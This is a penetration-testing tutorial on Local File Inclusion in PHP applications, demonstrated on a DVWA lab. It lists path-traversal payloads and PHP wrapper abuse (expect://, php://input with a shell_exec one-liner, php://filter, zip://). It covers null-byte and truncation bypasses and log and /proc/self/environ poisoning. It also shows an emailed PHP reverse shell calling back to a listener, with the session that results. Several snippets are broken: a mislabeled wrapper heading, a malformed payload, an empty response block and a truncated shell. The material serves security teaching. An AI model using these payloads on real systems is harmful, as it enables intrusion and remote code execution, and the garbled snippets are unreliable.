Web Application Penetration Testing

Local File Inclusion (LFI) Testing Techniques

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Introduction

The intent of this document is to help penetration testers and students identify and test LFI vulnerabilities on future penetration testing engagements by consolidating research for local file inclusion LFI penetration testing techniques. LFI vulnerabilities are typically discovered during web app penetration testing using the techniques contained within this document. Additionally, some of the techniques mentioned in this paper are also commonly used in CTF style competitions.
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What is a Local File Inclusion (LFI) vulnerability?

**Local File Inclusion (LFI)** allows an attacker to include files on a server through the web browser. This vulnerability exists when a web application includes a file without correctly sanitising the input, allowing and attacker to manipulate the input and inject path traversal characters and include other files from the web server.

**Example of Vulnerable Code**

The following is an example of PHP code vulnerable to local file inclusion.

```php
<?php
    $file = $_GET['file'];
    if(isset($file))
    {
        include("pages/$file");
    }
    else
    {
        include("index.php");
    }
?>
```

**Identifying LFI Vulnerabilities within Web Applications**

LFI vulnerabilities are easy to identify and exploit. Any script that includes a file from a web server is a good candidate for further LFI testing, for example:

```
/script.php?page=index.html
```

A penetration tester would attempt to exploit this vulnerability by manipulating the file location parameter, such as:

```
/script.php?page=../../../../../../../../etc/passwd
```

The above is an effort to display the contents of the /etc/passwd file on a UNIX / Linux based system.
Below is an example of a successful exploitation of an LFI vulnerability on a web application:

```bash
view-source:http://10.0.1.147/dvwa/vulnerabilities/lfi/?page=../../../../etc/passwd
```

**PHP Wrappers**

PHP has a number of wrappers that can often be abused to bypass various input filters.

**PHP Expect Wrapper**

PHP expect:// allows execution of system commands, unfortunately the expect PHP module is not enabled by default.

Example:

```bash
php?page=expect://ls
```
PHP file:// Wrapper

The payload is sent in a POST request to the server such as:

```
-fi/?page=php://input&cmd=ls
```

Example using php://input against DVWA:

**Request:**

```
POST /dvwa/vulnerabilities/fi/?page=php://input&cmd=ls HTTP/1.1
Host: 10.0.1.148
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.148/dvwa/vulnerabilities/fi/?page=zip:ph3shell.zip
Cookie: security=low; PHPSESSID=0f515ntknt7nfp87bb23epb4
Connection: close
Content-Length: 44
```

```php
echo shell_exec($_GET['cmd']);?
```

**Web Application Response:**

```
```

**Image description:** POST request using php://input
**Image description:** The output from the command "ls" is rendered above the DVWA banner.

**PHP `php://filter`**

`php://filter` allows a pen tester to include local files and base64 encodes the output. Therefore, any base64 output will need to be decoded to reveal the contents.

An example using DVWA:

```
vuln.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
```

**Image description:** Image showing the base64 encoded text at the top of the rendered page

Base64 decoding the string provides the `/etc/passwd` file:
Image description: An image showing the base64 decoded output from /etc/passwd on a UNIX / Linux system.
PHP ZIP Wrapper LFI

The zip wrapper processes uploaded .zip files server side allowing a penetration tester to upload a zip file using a vulnerable file upload function and leverage he zip filter via an LFI to execute. A typical attack example would look like:

1. Create a PHP reverse shell
2. Compress to a .zip file
3. Upload the compressed shell payload to the server
4. Use the zip wrapper to extract the payload using:
   ```php
   page=zip://path/to/file.zip%23shell
   ```
5. The above will extract the zip file to shell, if the server does not append .php rename it to shell.php instead

If the file upload function does not allow zip files to be uploaded, attempts can be made to bypass the file upload function (see: OWASP file upload testing document).
LFI via /proc/self/environ

If it's possible to include /proc/self/environ via a local file inclusion vulnerability, then introducing source code via the User Agent header is a possible vector. Once code has been injected into the User Agent header a local file inclusion vulnerability can be leveraged to execute /proc/self/environ and reload the environment variables, executing your reverse shell.

Useful Shells

Useful tiny PHP back doors for the above techniques:

```php
<? system('uname -a');?>
```

Null Byte Technique

Null byte injection bypasses application filtering within web applications by adding URL encoded “Null bytes” such as %00. Typically, this bypasses basic web application blacklist filters by adding additional null characters that are then allowed or not processed by the backend web application.

Some practical examples of null byte injection for LFI:

```url
vuln.php?page=/etc/passwd%00
vuln.php?page=/etc/passwd%2500
```
**Truncation LFI Bypass**

Truncation is another blacklist bypass technique. By injecting long parameter into the vulnerable file inclusion mechanism, the web application may “cut it off” (truncate) the input parameter, which may bypass the input filter.

**LFI truncation examples:**

```bash
vuln.php?page=/etc/passwd
```

```bash
vuln.php?page=../../../../../../../..
```

```bash
vuln.php?page=/etc/passwd/../../../../../../../../../../../../../../../..
```

**Log File Contamination**

Log file contamination is the process of injecting source code into log files on the target system. This is achieved by introducing source code via other exposed services on the target system which the target operating system / service will store in log files. For example, injecting PHP reverse shell code into a URL, causing syslog to create an entry in the apache access log for a 404 page not found entry. The apache log file would then be parsed using a previously discovered file inclusion vulnerability, executing the injected PHP reverse shell.

After introducing source code to the target systems log file(s) the next step is identifying the location of the log file. During the recon and discovery stage of penetration testing the web server and likely the target operating system would have been identified, a good starting point would be looking up the default log paths for the identified operating system and web server (if they are not already known by the consultant). FuzzDB’s Burp LFI payload lists can be used in conjunction with Burp intruder to quickly identify valid log file locations on the target system.
Some commonly exposed services on a Linux / UNIX systems are listed below:

**Apache / Nginx**

Inject code into the web server access or error logs using netcat, after successful injection parse the server log file location by exploiting the previously discovered LFI vulnerability. If the web server access / error logs are long, it may take some time execute your injected code.

**Email a Reverse Shell**

If the target machine relays mail either directly or via another machine on the network and stores mail for the user www-data (or the apache user) on the system then it’s possible to email a reverse shell to the target. If no MX records exist for the domain but SMTP is exposed it’s possible to connect to the target mail server and send mail to the www-data / apache user. Mail is sent to the user running apache such as www-data to ensure file system permissions will allow read access the file `/var/spool/mail/www-data` containing the injected PHP reverse shell code.

First enumerate the target system using a list of known UNIX / Linux account names:

```
root@kali:/Tools/wordlists/SecLists/Usernames# smtp-user-enum -M VRFY -U top_shortlist.txt -t 10.0.1.148
Starting smtp-user-enum v1.2 (http://pentestmonkey.net/tools/smtp-user-enum)

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Mode ...................... VRFY
Worker Processes ........ 5
Usernames file .......... top_shortlist.txt
Target count ............ 1
Username count .......... 13
Target TCP port ......... 25
Query timeout ........... 5 secs
Target domain ...........

###### Scan started at Wed Jan 4 19:40:39 2017 #######
10.0.1.148: root exists
10.0.1.148: mysql exists
10.0.1.148: www-data exists
###### Scan completed at Wed Jan 4 19:40:39 2017 #######
3 results.
13 queries in 1 seconds (13.0 queries / sec)
```

**Image description:** The above image uses the smtp-user-enum script confirming the www-data user exists on the system
The following screenshot shows the process of sending email via telnet to the www-data user:

```
root@kali:~ # telnet 10.0.1.148 25
Trying 10.0.1.148...
Connected to 10.0.1.148.
Escape character is '^]'.
220 dvwa-ubuntu ESMTP Postfix (Ubuntu)
HELO localhost
250 dvwa-ubuntu
MAIL FROM:<root>
250 2.1.0 Ok
RCPT TO:<www-data>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>

<?php
set_time_limit (0);
$VERSION = "1.9";
$ip = '10.0.1.145'; // CHANGE THIS
$port = 80; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists( 'pcntl_fork' )) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
```
Resulting in a reverse shell connecting back to a running netcat listener:

```
root@kali:~# netcat -nvip 80
listening on [any] 80 ...
connect to [10.0.1.148] from (UNKNOWN) [10.0.1.148] 45205
Linux dvwa-ubuntu 3.13.0-106-generic #153-precise1-Ubuntu SMP Tue Dec 6 16:12:15 UTC 2016
x86_64 x86_64 x86 64 GNU/Linux
01:04:01 up 42 min, 1 user, load average: 0.00, 0.01, 0.04
USER TTY FROM LOGIN@ IDLE CPU PCPU WHAT
root ttys 0 - 0:28 - 6:14 0.31s 0.19s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -ar
Linux dvwa-ubuntu 3.13.0-106-generic #153-precise1-Ubuntu SMP Tue Dec 6 16:12:15 UTC 2016
x86_64 x86_64 x86 64 GNU/Linux
$ 
```

References

Information sources used within this document:

- [https://highon.coffee/blog/lfi-cheat-sheet/](https://highon.coffee/blog/lfi-cheat-sheet/)
- [https://www.owasp.org/index.php/PHP_File_Inclusion](https://www.owasp.org/index.php/PHP_File_Inclusion)
- DVWA (used for LFI examples): [http://www.dvwa.co.uk/](http://www.dvwa.co.uk/)